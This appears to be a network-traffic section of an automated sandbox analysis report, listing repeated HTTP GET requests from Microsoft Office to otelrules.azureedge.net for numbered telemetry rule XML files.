Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
